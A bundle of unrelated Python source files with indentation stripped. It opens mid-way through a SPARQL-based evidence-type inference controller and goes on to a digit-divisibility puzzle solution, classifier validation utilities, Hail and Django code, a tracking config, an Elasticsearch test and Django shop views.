q = q + SPARQL_RANDOMIZATION
elif data['ct-ev-question-1'] == 'no':
q = q + SPARQL_NO_RANDOMIZATION
# parallel group design? -- TODO: as defined, there will be no types with both group randomziation AND a parallel groups design. Should we make the q1 and q2 radio buttons work so that users can't select that option
if data['ct-ev-question-2'] == 'yes':
q = q + SPARQL_PAR_GROUPS
elif data['ct-ev-question-2'] == 'no':
q = q + SPARQL_NOT_PAR_GROUPS
# examining pharmacokinetics?
if data['ct-ev-question-3'] == 'yes':
q = q + SPARQL_PK
if data['ct-ev-question-1'] == 'yes':
q = q.replace(SPARQL_RANDOMIZATION,'')
inferenceNotes += " Randomization is currently ignored in the definition of pharmacokinetic studies. "
elif data['ct-ev-question-1'] == 'no':
q = q.replace(SPARQL_NO_RANDOMIZATION,'')
inferenceNotes += " Randomization is currently ignored in the definition of pharmacokinetic studies. "
if data['ct-ev-question-2'] == 'yes':
q = q.replace(SPARQL_PAR_GROUPS,'')
inferenceNotes += " Patient group assignment (e.g., parallel vs non-parallel) is currently ignored in the definition of pharmacokinetic studies. "
elif data['ct-ev-question-2'] == 'no':
q = q.replace(SPARQL_NOT_PAR_GROUPS,'')
inferenceNotes += " Patient group assignment (e.g., parallel vs non-parallel) is currently ignored in the definition of pharmacokinetic studies. "
elif data['ct-ev-question-3'] == 'no':
q = q + SPARQL_NOT_PK
# phenotyping done as part of the study?
if data['ct-ev-question-4'] == 'yes':
# phenotyping is a defining feature of PK studies but not DDI studies (TODO: consider changing this in the ev type definitions)
if data['ct-ev-question-3'] == 'yes':
q = q + SPARQL_PHENOTYPE
else:
inferenceNotes += " Questions will be included to help you assess the phenotyping aspect of the study. "
elif data['ct-ev-question-4'] == 'no':
q = q + SPARQL_NOT_PHENOTYPE
# genotyping done as part of the study?
if data['ct-ev-question-5'] == 'yes':
# genotyping is a defining feature of PK studies but not DDI studies (TODO: consider changing this in the ev type definitions)
if data['ct-ev-question-3'] == 'yes':
q = q + SPARQL_GENOTYPE
else:
inferenceNotes += " Questions will be included to help you assess the genotyping aspect of the study. "
elif data['ct-ev-question-5'] == 'no':
q = q + SPARQL_NOT_GENOTYPE
if not data.get('ex-ev-mt-question-1'):
print "INFO: skipping in vitro metabolic questions"
else:
q = q + SPARQL_IN_VITRO_DESIGN
if data['ex-ev-mt-question-1'] == 'inhibition':
q = q + SPARQL_METABOLISM_INHIBITION
elif data['ex-ev-mt-question-1'] == 'identification':
q = q + SPARQL_METABOLISM_IDENTIFICATION
if data['ex-ev-mt-question-4'] == 'yes':
q = q + SPARQL_INVOLVES_CYP450
elif data['ex-ev-mt-question-4'] == 'no':
q = q + SPARQL_NOT_INVOLVES_CYP450
if data['ex-ev-mt-question-2'] == 'humanTissue':
if data['ex-ev-mt-question-4'] == 'no':
inferenceNotes += " Questions will be included to help you assess the use of human tissue in a metabolic mechanism identification experiment that are NOT focused on CYP450 enzymes."
else:
q = q + SPARQL_INVOLVES_HUMAN_MICROSOMES
elif data['ex-ev-mt-question-2'] == 'cellLine':
if data['ex-ev-mt-question-4'] == 'no':
inferenceNotes += " Questions will be included to help you assess the use of recombinant cell lines in a metabolic mechanism identification experiment that are NOT focused on CYP450 enzymes."
else:
q = q + SPARQL_INVOLVES_RECOMBINANT_SYSTEM
if data['ex-ev-mt-question-3'] == 'antibody':
if data['ex-ev-mt-question-1'] != 'identification':
q = q + SPARQL_INVOLVES_ANTIBODY_INHIBITOR
if data['ex-ev-mt-question-4'] == 'yes' and data['ex-ev-mt-question-2'] == 'unsure':
inferenceNotes += " The evidence type ontology requires that CYP450 inhibition studies specify either human tissues or recombinant cell lines."
if data['ex-ev-mt-question-1'] == 'inhibition':
inferenceNotes += " You selected that the mechanistic focus of the experiment is 'inhibition'. The evidence type ontology assumes that the use antibody inhibition applies only to metabolism mechanism identification experiments."
else:
q = q + SPARQL_NOT_INVOLVES_ANTIBODY_INHIBITOR + SPARQL_NOT_INVOLVES_CHEMICAL_INHIBITOR
inferenceNotes += " Questions will be included to help you assess the use of an antibody inhibitor in a metabolic mechanism identification experiment."
elif data['ex-ev-mt-question-3'] == 'chemical':
if data['ex-ev-mt-question-1'] != 'identification':
q = q + SPARQL_INVOLVES_CHEMICAL_INHIBITOR
if data['ex-ev-mt-question-4'] == 'yes' and data['ex-ev-mt-question-2'] == 'unsure':
inferenceNotes += " The evidence type ontology requires that CYP450 inhibition studies specify either human tissues or recombinant cell lines."
if data['ex-ev-mt-question-1'] == 'inhibition':
inferenceNotes += " You selected that the mechanistic focus of the experiment is 'inhibition'. The evidence type ontology assumes that the use chemical inhibition applies only to metabolism mechanism identification experiments."
else:
q = q + SPARQL_NOT_INVOLVES_ANTIBODY_INHIBITOR + SPARQL_NOT_INVOLVES_CHEMICAL_INHIBITOR
inferenceNotes += " Questions will be included to help you assess the use of an chemical inhibitor in a metabolic mechanism identification experiment."
elif data['ex-ev-mt-question-3'] == 'none':
q = q + SPARQL_NOT_INVOLVES_ANTIBODY_INHIBITOR + SPARQL_NOT_INVOLVES_CHEMICAL_INHIBITOR
if not data.get('ex-tp-ev-question-1'):
print "INFO: skipping in vitro transport questions"
else:
q = q + SPARQL_EX_VIVO_DESIGN
if data['ex-tp-ev-question-1'] == 'inhibition':
q = q + SPARQL_TRANSPORT_INHIBITION
elif data['ex-tp-ev-question-1'] == 'identification':
q = q + SPARQL_TRANSPORT_IDENTIFICATION
if data['ex-tp-ev-question-2'] == 'cacoTwoCellLines':
q = q + SPARQL_CACO_2_CELL_LINE
elif data['ex-tp-ev-question-2'] == 'overExpressedCellLines':
q = q + SPARQL_OVEREXPRESSED_CELL_LINE
elif data['ex-tp-ev-question-2'] == 'unsure':
q = q + SPARQL_NOT_OVEREXPRESSED_CELL_LINE + SPARQL_NOT_CACO_2_CELL_LINE
if data['ex-tp-ev-question-3'] == 'pGlycoprotein':
q = q + SPARQL_P_GLYCOPROTEIN
elif data['ex-tp-ev-question-3'] == 'oatpOnebOne':
q = q + SPARQL_OATP1B1
if data['ex-tp-ev-question-2'] == 'cacoTwoCellLines':
inferenceNotes += " You selected Caco 2 cell lines as the assay type of the experiment. This system is not generally used in experiments involving solute carrier organic anion transporter family members."
elif data['ex-tp-ev-question-3'] == 'oatpOnebThree':
q = q + SPARQL_OATP1B3
if data['ex-tp-ev-question-2'] == 'cacoTwoCellLines':
inferenceNotes += " You selected Caco 2 cell lines as the assay type of the experiment. This system is not generally used in experiments involving solute carrier organic anion transporter family members"
#elif data['ex-tp-ev-question-3'] == 'unsure':
# q = q + SPARQL_NOT_OATP1B1 + SPARQL_NOT_OATP1B3 + SPARQL_NOT_P_GLYCOPROTEIN
# close the query with a request for the matching evidence types
q = q + SPARQL_EV_TYPE + '''
}
'''
print q
tstore.setQuery(q)
tstore.setReturnFormat(JSON)
qr = tstore.query().convert()
etRslt = ""
definition = ""
uri = ""
evTypeCnt = 0
if len(qr["results"]["bindings"]) == 0:
print "results from sparql query is none "
etRslt = "No evidence type matching the chosen characteristics."
inferenceNotes += "Please revise your selections or click the 'Disagree' button below to manually select an evidence type."
else:
print "results: %s" % qr
evTypeData = [{"evItem":x["evItem"]["value"],"label":x["label"]["value"],"evType":x["evType"]["value"],"definition":x["definition"]["value"]} for x in qr["results"]["bindings"]]
print "evTypeData: %s" % evTypeData
curEvItem = ""
evTypeCnt = len(evTypeData)
for it in evTypeData:
if it["evItem"] == curEvItem:
etRslt += "-->%s" % it["label"]
definition += "-->%s" % it["definition"]
uri += "-->%s" % it["evType"]
else:
curEvItem = it["evItem"]
etRslt += "%s" % it["label"]
definition += "%s" % it["definition"]
uri += "%s" % it["evType"]
if etRslt == "":
etRslt = "ERROR: Couldn't infer evidence type"
inferred_evidence_type = (etRslt, definition, inferenceNotes, evTypeCnt, uri)
return inferred_evidence_type
def getInclusionCriteriaResult():
return True
def agreeInclusionCriteria():
print '[INFO] form controller agree inclusion criteria...'
db((db.evidence_type.participant_code == session.part_code) & (db.evidence_type.task_id == session.task_id)).update(is_agree_with_ic_result = True)
def disagreeInclusionCriteria():
print '[INFO] form controller disagree inclusion criteria...'
db((db.evidence_type.participant_code == session.part_code) & (db.evidence_type.task_id == session.task_id)).update(is_agree_with_ic_result = False)
# finished current task, redirect to summary page, mark the finished status
def finishTask():
print '[INFO] form controller finish task...'
db(db.icl_form.id == session.ic_form_id).update(is_finished = True)
db((db.evidence_type.participant_code == session.part_code) & (db.evidence_type.task_id == session.task_id)).update(is_finished = True, disagree_comment = request.vars["ic-comment"])
session.mp_method = None
session.task_id = None
session.ic_form_id = None
redirect(URL(request.application, 'summary','index'), client_side=True)
|
n = input()
a = [int(x) for x in raw_input().split()]
s = sum(a)
d = {}
for i in a:
if i in d:
d[i] += 1
else:
d[i] = 1
if s%3 == 0 and 0 in d and d[0] != n:
a.sort(reverse=True)
res = ""
for i in a:
res += str(i)
print res
else:
rem = s%3
if rem == 1:
if 1 in d:
d[1] -= 1
rem = 0
elif 4 in d:
d[4] -= 1
rem = 0
elif 7 in d:
d[7] -= 1
rem = 0
elif 2 in d and d[2] >= 2:
d[2] -= 2
rem = 0
elif 2 in d and 5 in d and d[2] > 0 and d[5] > 0:
d[2] -= 1
d[5] -= 1
rem = 0
elif 5 in d and d[5] >= 2:
d[5] -= 2
rem = 0
elif 2 in d and 8 in d and d[2] > 0 and d[8] > 0:
d[2] -= 1
d[8] -= 1
rem = 0
elif 8 in d and d[8] >= 2:
d[8] -= 2
rem = 0
elif 8 in d and 5 in d and d[8] > 0 and d[5] > 0:
d[8] -= 1
d[5] -= 1
rem = 0
elif rem == 2:
if 2 in d:
d[2] -= 1
rem = 0
elif 5 in d:
d[5] -= 1
rem = 0
elif 8 in d:
d[8] -= 1
rem = 0
elif 1 in d and d[1] >= 2:
d[1] -= 2
rem = 0
elif 1 in d and 4 in d and d[1] > 0 and d[4] > 0:
d[1] -= 1
d[4] -= 1
rem = 0
elif 4 in d and d[4] >= 2:
d[4] -= 2
rem = 0
elif 1 in d and 7 in d and d[1] > 0 and d[7] > 0:
d[1] -= 1
d[7] -= 1
rem = 0
elif 7 in d and d[7] >= 2:
d[7] -= 2
rem = 0
elif 7 in d and 4 in d and d[7] > 0 and d[4] > 0:
d[7] -= 1
d[4] -= 1
rem = 0
if rem != 0 or 0 not in d:
print -1
else:
l = []
for key in d:
while d[key] > 0:
l.append(key)
d[key] -= 1
l.sort(reverse=True)
res = ""
for i in l:
res += str(i)
if res.count('0') == len(l) or res == "":
res = "0"
print res
|
from nbconvert.preprocessors import Preprocessor
from nbformat import NotebookNode
class SkipIgnored(Preprocessor):
def preprocess(self, nb, resources):
def included(cell):
cell.metadata.ipub = cell.metadata.get("ipub", NotebookNode())
return not cell.metadata.ipub.get("ignore", False)
nb.cells = list(filter(included, nb.cells))
return nb, resources |
from __future__ import division
import numpy as np
import pandas as pd
from sklearn.dummy import DummyClassifier
from sklearn.model_selection import StratifiedShuffleSplit, LeavePGroupsOut
from sklearn.utils import resample, check_X_y
from sklearn.utils.validation import check_is_fitted
from prep import SITES
from metrics import (
calc_ccc,
calc_csmf_accuracy_from_csmf,
correct_csmf_accuracy
)
class RandomClassifier(DummyClassifier):
"""Classifier to generate predictions uniformly at random
This subclasses sklearn.dummy.DummyClassifier and overrides the predict
method.
"""
def __init__(self, random_state=None, **kwargs):
self.strategy = 'uniform'
self.constant = 1
self.random_state = random_state
for arg, val in kwargs.items():
setattr(self, arg, val)
def predict(self, X):
"""Perform classification on test X.
This overrides the default behavior by of Sklearn classifiers by
returning both individual and population level predictions. This is
necessary because other classifiers estimate population distributions
in a manner slightly de-coupled from individual predictions.
Args:
X (dataframe): samples by features to test
Returns:
tuple:
* predictions (series): individual level prediction
* csmf: (series): population level predictions
"""
# This is a hack to use this classifer to test configuration where
# the default setup is used. With the default, None, is passed to
# ``clf.fit()`` and `clf.predict()`` doesn't know what classes to
# predict.
if not check_is_fitted(self, 'classes_'):
self.fit(X, X.index)
pred = super(RandomClassifier, self).predict(X)
indiv = pd.Series(pred, index=X.index)
csmf = indiv.value_counts() / len(indiv)
return indiv, csmf
def prediction_accuracy(clf, X_train, y_train, X_test, y_test,
resample_test=True, resample_size=1):
"""Mesaure prediction accuracy of a classifier.
Args:
clf: sklearn-like classifier object. It must implement a fit method
with the signature ``(X, y) --> self`` and a predict method with
a signature ``(X) --> (y, csmf)``
X_train (dataframe): samples by features matrix used for training
y_train (series): target values used for training
X_test (dataframe): samples by features matrix used for testing
y_test (series): target values to compare predictions against
resample_test (bool): resample test data to a dirichlet distribution
resample_size (float): scalar applied to n of samples to determine
output resample size.
Returns:
tuple:
* preds (dataframe): two column dataframe with actual and predicted
values for all observations
* csmfs (dataframe): two column dataframe with actual and predicted
cause-specific mortality fraction for each cause
* trained (dataframe): matrix of learned associations between
cause/symptom pairs from the training data
* ccc (dataframe): chance-correct concordance for each cause in one row
* accuracy (dataframe): summary accuracy measures in one row
"""
y_pred, csmf_pred = clf.fit(X_train, y_train).predict(X_test)
# All the outputs should be dataframes which can be concatentated and
# saved without the index
preds = pd.concat([y_test, y_pred], axis=1)
preds.index.name = 'ID'
preds.columns = ['actual', 'prediction']
preds.reset_index(inplace=True)
# Only calculate CCC for real causes. The classifier may predict causes
# which are not in the set of true causes. This primarily occurs when
# the classifier is run using default settings and no training or when it
# isn't properly learning impossible causes.
ccc = pd.DataFrame([{cause: calc_ccc(cause, y_test, y_pred)
for cause in y_test.unique()}])
# It's possible for some classes predictions not to occur
# These would result in missingness when aligning the csmf series
csmf_actual = y_test.value_counts(dropna=False, normalize=True)
csmf = pd.concat([csmf_actual, csmf_pred], axis=1).fillna(0)
csmf.index.name = 'cause'
csmf.columns = ['actual', 'prediction']
csmf.reset_index(inplace=True)
csmf_acc = calc_csmf_accuracy_from_csmf(csmf.actual, csmf.prediction)
cccsmf_acc = correct_csmf_accuracy(csmf_acc)
converged = int(clf.converged_) if hasattr(clf, 'converged_') else 1
accuracy = pd.DataFrame([[
ccc.iloc[0].mean(),
ccc.iloc[0].median(),
csmf_acc,
cccsmf_acc,
converged,
]], columns=['mean_ccc', 'median_ccc', 'csmf_accuracy', 'cccsmf_accuracy',
'converged'])
return preds, csmf, ccc, accuracy
def dirichlet_resample(X, y, n_samples=None, random_state=None):
"""Resample so that the predicted classes follow a dirichlet distribution.
When using a stratified split strategy for validation the cause
distribution between the test and train splits are similiar. Resampling the
test data using a dirichlet distribution provides a cause distribution in
the test data which is uncorrelated to the cause distribution of the
training data. This is essential for correctly estimating accuracy at
the population level across a variety of population. A classifier which
knows the output distribution may perform well by only predicting the most
common causes regardless of the predictors. This classifier would easily
do better than chance. Alternatively, a classifier may a very high
sensitivity for only one cause and guess at random for all other causes.
If only tested in a population with a high prevalence of this cause, the
classifier may appear to be very good. Neither of these provide robust
classifier which can be widely used. Resampling the test split provides a
better estimate of out of sample validity. The dirichlet distribution is
conjugate prior of the multinomial distribution and always sums to one, so
it is suitable for resampling categorical data.
Args:
X (dataframe): samples by features matrix
y (series): target values
n_samples (int): number of samples in output. If none this defaults
to the length of the input
Return:
tuple:
* X_new (dataframe): resampled data
* y_new (series): resampled predictions
"""
if len(X.index.symmetric_difference(y.index)):
raise ValueError('X and y do not have matching indices')
check_X_y(X, y)
if not n_samples:
n_samples = len(X)
causes = np.unique(y)
n_causes = len(causes)
# Draw samples from a dirichlet distribution where the alpha value for
# each cause is the same
csmf = np.random.dirichlet(np.ones(n_causes))
# To calculate counts for each cause we multiply fractions through by the
# desired sampled size and round down. We then add counts for the total
# number of missing observations to achieve exactly the desired size.
counts = np.vectorize(int)(csmf * n_samples)
counts = counts + np.random.multinomial(n_samples - counts.sum(), csmf)
X_new = pd.concat([resample(X.loc[y == cause], n_samples=counts[i])
for i, cause in enumerate(causes)])
y_new = pd.Series(np.repeat(causes, counts), index=X_new.index)
assert len(X_new) == len(y_new) == n_samples
return X_new, y_new
def validate(X, y, clf, splits, subset=None, resample_test=True,
resample_size=1, random_state=None):
"""Mesaure out of sample accuracy of a classifier.
Args:
X: (dataframe) rows are records, columns are features
y: (series) predictions for each record
clf: sklearn-like classifier object. It must implement a fit method
with the signature ``(X, y) --> self`` and a predict method with
a signature ``(X) --> (y, csmf)``
model_selector: (sklearn model_selection) iterator to produce
test-train splits with optional split_id method added
groups: (series) encoded group labels for each sample
ids: (dict) column -> constant, added to the returned dataframe
subset: (tuple of int) splits to perform
Returns:
(tuple of dataframes): sames as ``prediction_accuracy`` for every split
in ``subset`` with results concatenated.
"""
output = [[], [], [], []]
for i, (train_index, test_index, split_id) in enumerate(splits):
if subset:
start, stop = subset
if i < start:
continue
if i > stop:
break
if train_index is None:
X_train = None
y_train = None
else:
X_train = X.iloc[train_index]
y_train = y.iloc[train_index]
X_test = X.iloc[test_index]
y_test = y.iloc[test_index]
if resample_test:
n_samples = round(resample_size * len(X_test))
X_test, y_test = dirichlet_resample(X_test, y_test, n_samples)
results = prediction_accuracy(clf, X_train, y_train, X_test, y_test)
for i, result in enumerate(results):
result['split'] = split_id
output[i].append(result)
return list(map(pd.concat, output))
def out_of_sample_splits(X, y, n_splits, test_size=.25, random_state=None):
splits = StratifiedShuffleSplit(n_splits=n_splits, test_size=test_size,
random_state=random_state).split(X, y)
for i, (train, test) in enumerate(splits):
yield train, test, i
def in_sample_splits(X, y, n_splits):
X, y = check_X_y(X, y)
idx = np.arange(len(y))
for i in range(n_splits):
yield idx, idx, i
def no_training_splits(X, y, n_splits):
X, y = check_X_y(X, y)
idx = np.arange(len(y))
for i in range(n_splits):
yield None, idx, i
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('groups', '0003_add_foreign_keys'),
]
operations = [
migrations.AlterModelOptions(
name='group',
options={'ordering': ['-featured', '-is_national', 'group__name'], 'permissions': (('can_edit_any_group', 'Can edit any group.'), ('can_edit_group_category', "Can change a group's category."), ('can_edit_group_featured', "Can change a group's featured status."))},
),
]
|
from .matchresult import MatchResult
from .predthread import PredictionThread
__all__ = [MatchResult, PredictionThread] |
from hail.expr.expressions import *
from hail.expr.expressions.expression_typecheck import *
from hail.expr.types import *
from hail.typecheck import *
from hail.expr.functions import _func
@typecheck(ac=expr_int32, an=expr_int32, ci=expr_float64)
def filtering_allele_frequency(ac, an, ci) -> Float64Expression:
"""
Computes a filtering allele frequency (described below)
for `ac` and `an` with confidence `ci`.
The filtering allele frequency is the highest true population allele frequency
for which the upper bound of the `ci` (confidence interval) of allele count
under a Poisson distribution is still less than the variant’s observed
`ac` (allele count) in the reference sample, given an `an` (allele number).
This function defines a "filtering AF" that represents
the threshold disease-specific "maximum credible AF" at or below which
the disease could not plausibly be caused by that variant. A variant with
a filtering AF >= the maximum credible AF for the disease under consideration
should be filtered, while a variant with a filtering AF below the maximum
credible remains a candidate. This filtering AF is not disease-specific:
it can be applied to any disease of interest by comparing with a
user-defined disease-specific maximum credible AF.
For more details, see: `Whiffin et al., 2017 <https://www.nature.com/articles/gim201726>`__
Parameters
----------
ac : int or :class:`.Expression` of type :py:data:`.tint32`
an : int or :class:`.Expression` of type :py:data:`.tint32`
ci : float or :class:`.Expression` of type :py:data:`.tfloat64`
Returns
-------
:class:`.Expression` of type :py:data:`.tfloat64`
"""
return _func("filtering_allele_frequency", tfloat64, ac, an, ci) |
#!/usr/bin/env python
# -*- coding:UTF-8 -*-
import os.path as osp
from easydict import EasyDict as edict
import math
__C = edict()
# Consumers can get config by: import config as cfg
cfg = __C
# Selected object
__C.TRACK_OBJ = 'Car' # Pedestrian/Cyclist
if __C.TRACK_OBJ == 'Car' or __C.TRACK_OBJ == 'Van':
__C.TEMPLATE_Z_MIN = -3.2
__C.TEMPLATE_Z_MAX = 3.2
__C.TEMPLATE_Y_MIN = -5.12
__C.TEMPLATE_Y_MAX = 5.12
__C.TEMPLATE_X_MIN = -3.2
__C.TEMPLATE_X_MAX = 3.2
__C.SCENE_Z_MIN = -5.12
__C.SCENE_Z_MAX = 5.12
__C.SCENE_Y_MIN = -5.12
__C.SCENE_Y_MAX = 5.12
__C.SCENE_X_MIN = -5.12
__C.SCENE_X_MAX = 5.12
__C.VOXEL_Z_SIZE = 0.16
__C.VOXEL_Y_SIZE = 10.24
__C.VOXEL_X_SIZE = 0.16
__C.VOXEL_POINT_COUNT = 35
__C.TEMPLATE_INPUT_DEPTH = int((__C.TEMPLATE_Z_MAX - __C.TEMPLATE_Z_MIN) / __C.VOXEL_Z_SIZE)
__C.TEMPLATE_INPUT_HEIGHT = int((__C.TEMPLATE_Y_MAX - __C.TEMPLATE_Y_MIN) / __C.VOXEL_Y_SIZE)
__C.TEMPLATE_INPUT_WIDTH = int((__C.TEMPLATE_X_MAX - __C.TEMPLATE_X_MIN) / __C.VOXEL_X_SIZE)
__C.SCENE_INPUT_DEPTH = int((__C.SCENE_Z_MAX - __C.SCENE_Z_MIN) / __C.VOXEL_Z_SIZE)
__C.SCENE_INPUT_HEIGHT = int((__C.SCENE_Y_MAX - __C.SCENE_Y_MIN) / __C.VOXEL_Y_SIZE)
__C.SCENE_INPUT_WIDTH = int((__C.SCENE_X_MAX - __C.SCENE_X_MIN) / __C.VOXEL_X_SIZE)
__C.INPUT_WIDTH = int(__C.SCENE_INPUT_WIDTH - __C.TEMPLATE_INPUT_WIDTH)
__C.INPUT_HEIGHT = int(__C.SCENE_INPUT_HEIGHT - __C.TEMPLATE_INPUT_HEIGHT)
__C.INPUT_DEPTH = int(__C.SCENE_INPUT_DEPTH - __C.TEMPLATE_INPUT_DEPTH)
__C.FEATURE_RATIO = 2
__C.FEATURE_WIDTH = int(__C.INPUT_WIDTH / __C.FEATURE_RATIO) + 1
__C.FEATURE_HEIGHT = int(__C.INPUT_HEIGHT / __C.FEATURE_RATIO) + 1
__C.FEATURE_DEPTH = int(__C.INPUT_DEPTH / __C.FEATURE_RATIO) + 1
else:
__C.TEMPLATE_Z_MIN = -1.6
__C.TEMPLATE_Z_MAX = 1.6
__C.TEMPLATE_Y_MIN = -2.56
__C.TEMPLATE_Y_MAX = 2.56
__C.TEMPLATE_X_MIN = -1.6
__C.TEMPLATE_X_MAX = 1.6
__C.SCENE_Z_MIN = -2.56
__C.SCENE_Z_MAX = 2.56
__C.SCENE_Y_MIN = -2.56
__C.SCENE_Y_MAX = 2.56
__C.SCENE_X_MIN = -2.56
__C.SCENE_X_MAX = 2.56
__C.VOXEL_Z_SIZE = 0.08
__C.VOXEL_Y_SIZE = 5.12
__C.VOXEL_X_SIZE = 0.08
__C.VOXEL_POINT_COUNT = 45
__C.TEMPLATE_INPUT_DEPTH = int((__C.TEMPLATE_Z_MAX - __C.TEMPLATE_Z_MIN) / __C.VOXEL_Z_SIZE)
__C.TEMPLATE_INPUT_HEIGHT = int((__C.TEMPLATE_Y_MAX - __C.TEMPLATE_Y_MIN) / __C.VOXEL_Y_SIZE)
__C.TEMPLATE_INPUT_WIDTH = int((__C.TEMPLATE_X_MAX - __C.TEMPLATE_X_MIN) / __C.VOXEL_X_SIZE)
__C.SCENE_INPUT_DEPTH = int((__C.SCENE_Z_MAX - __C.SCENE_Z_MIN) / __C.VOXEL_Z_SIZE)
__C.SCENE_INPUT_HEIGHT = int((__C.SCENE_Y_MAX - __C.SCENE_Y_MIN) / __C.VOXEL_Y_SIZE)
__C.SCENE_INPUT_WIDTH = int((__C.SCENE_X_MAX - __C.SCENE_X_MIN) / __C.VOXEL_X_SIZE)
__C.INPUT_WIDTH = int(__C.SCENE_INPUT_WIDTH - __C.TEMPLATE_INPUT_WIDTH)
__C.INPUT_HEIGHT = int(__C.SCENE_INPUT_HEIGHT - __C.TEMPLATE_INPUT_HEIGHT)
__C.INPUT_DEPTH = int(__C.SCENE_INPUT_DEPTH - __C.TEMPLATE_INPUT_DEPTH)
__C.FEATURE_RATIO = 2
__C.FEATURE_WIDTH = int(__C.INPUT_WIDTH / __C.FEATURE_RATIO) + 1
__C.FEATURE_HEIGHT = int(__C.INPUT_HEIGHT / __C.FEATURE_RATIO) + 1
__C.FEATURE_DEPTH = int(__C.INPUT_DEPTH / __C.FEATURE_RATIO) + 1
if __C.TRACK_OBJ == 'Car' or __C.TRACK_OBJ == 'Van':
# Car anchor
__C.ANCHOR_L = 3.9
__C.ANCHOR_W = 1.6
__C.ANCHOR_H = 1.56
__C.ANCHOR_Z = 0
__C.RPN_POS_IOU = 0.6
__C.RPN_NEG_IOU = 0.45
__C.SEARCH_AREA = 2.0
elif __C.TRACK_OBJ == 'Pedestrian':
# Pedestrian anchor
__C.ANCHOR_L = 0.8
__C.ANCHOR_W = 0.6
__C.ANCHOR_H = 1.73
__C.ANCHOR_Z = 0
__C.RPN_POS_IOU = 0.7
__C.RPN_NEG_IOU = 0.25
__C.SEARCH_AREA = 0.3
elif __C.TRACK_OBJ == 'Cyclist':
# Cyclist anchor
__C.ANCHOR_L = 1.76
__C.ANCHOR_W = 0.6
__C.ANCHOR_H = 1.73
__C.ANCHOR_Z = 0
__C.RPN_POS_IOU = 0.65
__C.RPN_NEG_IOU = 0.35
__C.SEARCH_AREA = 0.6
if __name__ == '__main__':
cfg.update({'TRACK_OBJ': 'aaa'})
print('__C.TRACK = ' + __C.TRACK_OBJ)
|
import nose.tools as nt
import logging
from topik.fileio.in_elastic import read_elastic
from topik.fileio.project import TopikProject
from topik.fileio.tests import test_data_path
from ._solutions import solution_elastic
from elasticsearch.exceptions import ConnectionError
from nose.plugins.skip import SkipTest
INDEX = "test_elastic"
# make logging quiet during testing, to keep Travis CI logs short.
logging.basicConfig()
logging.getLogger('elasticsearch').setLevel(logging.ERROR)
logging.getLogger('urllib3').setLevel(logging.ERROR)
def test_elastic_import():
output_args = {'source': 'localhost',
'index': INDEX,
'content_field': 'abstract'}
# import data from file into known elastic server
project = TopikProject("test_project", output_type='ElasticSearchOutput',
output_args=output_args)
try:
project.read_input('{}/test_data_json_stream.json'.format(
test_data_path), content_field="abstract")#,
#output_type=elastic.ElasticSearchOutput.class_key(),
#output_args=output_args, synchronous_wait=30)
except ConnectionError:
raise SkipTest("Skipping Elasticsearch test - elasticsearch not running")
loaded_corpus = read_elastic("localhost", index=INDEX)
solution_found = False
for doc in list(iter(loaded_corpus)):
if solution_elastic == doc['abstract']:
solution_found = True
break
nt.assert_true(solution_found)
# tear-down
from elasticsearch import Elasticsearch
instance = Elasticsearch("localhost")
if instance.indices.exists(INDEX):
instance.indices.delete(INDEX)
|
import re
from django.contrib.auth import login
from apps.shop.forms import PaymentChoiceForm
from django.db.models import query
from django.shortcuts import get_object_or_404, render, redirect
from django.http.response import HttpResponse, JsonResponse
from django.http.request import HttpRequest
from django.views.generic import ListView, DetailView, View
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
from django.conf import settings
# Create your views here.
from apps.store.models import Banner, Payment, Product, Category, Order, OrderItem, Address
from apps.store.forms import AddressForm
from . import cookie_store
class HomePage(ListView):
model = Category
context_object_name = "categories"
template_name = "shop/homepage.html"
def get_queryset(self):
return Category.objects.all()[:7]
def get_context_data(self, *args, **kwargs):
context = super().get_context_data()
context["banners"] = Banner.objects.filter(category=None)[:5]
context["all_products_count"] = Product.objects.all().count()
return context
class ProductListView(ListView):
model = Product
paginate_by = 12
context_object_name = "products"
template_name = "shop/shop.html"
current_category = None
search_query = None
def get_queryset(self, *args, **kwargs):
category_pk = self.kwargs.get("category_pk")
queryset = super().get_queryset()
self.search_query = self.request.GET.get("search", None)
if self.search_query:
queryset = queryset.filter(name__icontains=self.search_query)
if category_pk:
self.current_category = get_object_or_404(Category, pk=category_pk)
queryset = queryset.filter(category=self.current_category)
return queryset
def get_context_data(self, *args, **kwargs):
context = super().get_context_data(*args, **kwargs)
context["categories"] = Category.objects.all()
context["current_category"] = self.current_category
context["all_products_count"] = Product.objects.all().count()
context["search_query"] = self.search_query
return context
class ProductDetailView(DetailView):
model = Product
context_object_name = "product"
template_name = "shop/product.html"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
cookie_store.RecentList(self.request).add(self.get_object())
return context
@login_required
def add_product_to_order(request: HttpRequest, product_pk: int) -> HttpResponse:
order: Order = Order.objects.get_or_create(ordered=False, user=request.user)[0]
quantity: int = int(request.GET.get("quantity", 1))
product: Product = get_object_or_404(Product, pk=product_pk)
order_item_qs = OrderItem.objects.filter(order=order, product=product)
if order_item_qs.exists():
order_item: OrderItem = order_item_qs.first()
order_item.quantity += quantity
order_item.save()
else:
order_item: OrderItem = OrderItem.objects.create(
order=order, product=product, quantity=quantity
)
messages.success(request, f"Product '{product.name}' has been added to cart.")
return redirect("shop:cart")
@login_required
def add_product_to_cart_json(request: HttpRequest, product_pk: int):
quantity = int(request.GET.get("quantity", 1))
order = Order.objects.get_or_create(ordered=False, user=request.user)[0]
product = get_object_or_404(Product, pk=product_pk)
order_item_qs = OrderItem.objects.filter(order=order, product=product)
if order_item_qs.exists():
order_item: OrderItem = order_item_qs.first()
order_item.quantity += quantity
if order_item.quantity == 0:
order_item.delete()
else:
order_item.save()
else:
order_item: OrderItem = OrderItem.objects.create(
order=order, product=product, quantity=quantity
)
return JsonResponse(
{"quantity": order_item.quantity, "total": order_item.get_total_price()}
)
@login_required
def cart_view(request: HttpRequest):
order, _ = Order.objects.get_or_create(ordered=False, user=request.user)
return render(request, "shop/cart.html", {"order": order})
class CheckOut(LoginRequiredMixin, View):
def get(self, request: HttpRequest, *args, **kwargs):
if self.kwargs.get("address_pk"):
return self.post(request, *args, **kwargs)
order, _ = Order.objects.get_or_create(ordered=False, user=request.user)
if order.order_items.count() < 1:
messages.error(request, "Sorry you do not have any items in your order.")
return redirect("shop:product-list")
address_form = AddressForm()
return render(
request,
"shop/checkout.html",
{"address_form": address_form, "order": order},
)
